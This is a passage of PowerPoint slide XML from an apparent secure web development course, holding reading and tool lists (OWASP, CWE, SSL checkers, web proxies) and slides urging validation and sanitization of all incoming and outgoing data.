          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Top_10_2013-Top_10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://cwe.mitre.org/top25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.youtube.com/watch?v=CDbWvEwBBxo&amp;list=PL8239DA448CC2BB7C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Tamper Data - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/tamper-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Category:OWASP_WebScarab_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Fiddler - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>www.telerik.com/fiddler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>ZAP - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Server check - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>sslcheck.casecurity.org/en_US</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>www.ssllabs.com/ssltest/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Browser check - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://www.howsmyssl.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>www.ssllabs.com/ssltest/viewMyClient.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>blogs.msdn.com/b/codeanalysis/archive/2010/07/26/fxcop-10-0-is-available.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322517474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Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="8153400" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/OWASP_Validation_Documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Suggested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reading (where applicable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>asafaweb.com/OWASP%20Top%2010%20for%20.NET%20developers.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/OWASP_Guide_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/ASVS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Cheat_Sheets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/ESAPI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/SAMM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/OWASP_Education_Presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>www.w3schools.com/tags/att_input_autocomplete.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://www.ssllabs.com/projects/best-practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>csrc.nist.gov/groups/STM/cmvp/standards.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>www.tinfoilsecurity.com/blog/protect-your-website-from-embedded-content-iframe-security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5088866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(cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(suggested reading cont’d)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com/google-dorks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.paterva.com/web6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>msdn.microsoft.com/en-us/library/hh882339%28v=vs.100%29.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.owasp.org/images/5/58/OWASP_ASVS_Version_2.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/List_of_useful_HTTP_headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.networkworld.com/article/2686393/malicious-advertisements-distributed-by-doubleclick-zedo-networks.html?source=NWWNLE_nlt_security_2014-09-22#tk.rss_security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.sans.org/top25-software-errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>www.sans.org/reading-room/categories</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>www.securecoding.cert.org/confluence/display/jg/Java+Coding+Guidelines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://bsimm.com/download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1"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2262313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Validation/Sanitization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“Top Ten” items A1, A3, A8)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why’s and How’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4115103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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rule #1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447800"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ALL DATA IS SUSPECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You **MUST** sanitize **ALL** data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incoming  from users – mostly forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incoming from clients (if you have programs sending data – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – or AJAX - for example)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hidden fields, http headers, cookies, etc., coming from a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL parameters (although you shouldn’t really use these…see Safety Rule #1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All other incoming data of any kind</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26346796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Sanitization Rule #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 (cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitize all OUTGOING data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not as obvious, until you look at previous slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can’t be certain that the data in your database was not added before you sanitized input.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data  may have been added to your database in a way that  “skipped” your validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>minimum, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>encode all output fields to escape/remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all “problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
